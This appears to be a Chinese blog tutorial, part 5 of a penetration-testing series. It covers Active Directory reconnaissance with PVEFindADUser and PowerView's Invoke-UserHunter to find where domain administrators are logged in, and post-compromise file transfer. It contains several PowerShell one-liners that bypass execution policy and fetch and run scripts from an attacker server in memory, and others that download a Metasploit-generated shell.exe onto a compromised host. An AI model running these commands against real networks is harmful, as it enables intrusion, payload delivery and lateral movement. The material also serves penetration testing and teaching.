主页 > 网络知识 > 内网渗透测试:信息收集与上传下载(5)

内网渗透测试:信息收集与上传下载(5)

PVEFindADUser.exe 可用于查找活动目录用户登陆的位置、枚举域用户,以及查找在特定计算机上登陆的用户,包括查找本地用户。通过RDP远程桌面登陆的用户、通过运行服务和计划任务的用户。运行该工具需要计算机配置.NET Framework 2.0 环境,并需要有管理员权限。

 PVEFindADUser.exe <参数>

我们一般直接运行pvefinaduser.exe -current命令,即可显示域中所有计算机上当前登陆的所有用户。 

显示域中所有计算机上当前登陆的所有用户:

 

内网渗透测试:信息收集与上传下载

 

显示指定用户登陆的计算机:

具体参数:

current["username"]   如果仅指定了-current参数,将获取目标计算机上当前登录的所有用户。如果指定了用户名(DomainUsername),则显示该用户登陆的计算机  

 

内网渗透测试:信息收集与上传下载

其他参数:

 

-target   用于指定要查询的主机。如果未指定此参数,将查询当前与内所有主机  
利用 PowerView.ps1 脚本

下载地址:https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView

powerview脚本可以用来获取当前域管理员在线登录的服务器,其依赖powershell和wmi,在powersploit工具包中,是一个收集域信息很好用的脚本。

Invoke-UserHunter:搜索本地域中域管理员当前在线的主机,并验证当前用户是否具有对这些主机的本地管理员访问权限。它可以使用 Get-NetSessions 和Get-NetLoggedon 扫描每台服务器并对扫描结果进行比较,从而找出目标用户集,并且无需管理员权限。

如下,可以看到本地域有两个域管理员:

 

内网渗透测试:信息收集与上传下载

我们通过Invoke-UserHunter(等于Invoke-UserHunter -CheckAccess)来定位他们:

 

powershell.exe -exec bypass IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/powersploit/Recon/PowerView.ps1');Invoke-UserHunter

 

内网渗透测试:信息收集与上传下载

详情请执行Get-Help Invoke-UserHunter命令查看,具体使用方法与前两个相似,它可以找到域内特定的用户群,接受用户名、用户列表和域组列表查询,接受一个主机列表或查询可用的主机域名。一切都是灵活的,让你自己定义找寻谁,在哪里找。

 

获取指定用户在线机器:

 

内网渗透测试:信息收集与上传下载

 

PowerView是个非常强大、好用的内网渗透脚本,PowerView的其他命令请查看官方文档。

渗透中的文件上传与下载

有时候我们在拿下一台机器的控制权后,需要在这台主机上上传一些东西,有时还需要将目标机上的文件下载下来。我总结了一下几种方式。

利用Powershell进行文件上传 # 下载脚本并在内存中执行 powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/xxx.ps1')" # 下载文件到指定目录 powershell (new-object system.net.webclient).downloadfile('http://39.xxx.xxx.210/shell.exe','d:/test.exe')   # 下载文件到当前目录 powershell (new-object system.net.webclient).downloadfile('http://39.xxx.xxx.210/test.exe','test.exe') 利用Nishang实现文件上传

Download_Execute是Nishang中一个下载执行脚本,它在实战中最常用的功能就是下载一个文本文件,然后将其转换为exe可执行文件执行。

第一步:首先攻击者在本地用Nishang中的exetotext.ps1脚本将exe可执行文件更改为文本文件(这里我们的exe为msf生成的shell.exe)

powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/nishang/Utility/ExetoText.ps1');ExetoText c:shell.exe c:shell.txt"
说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!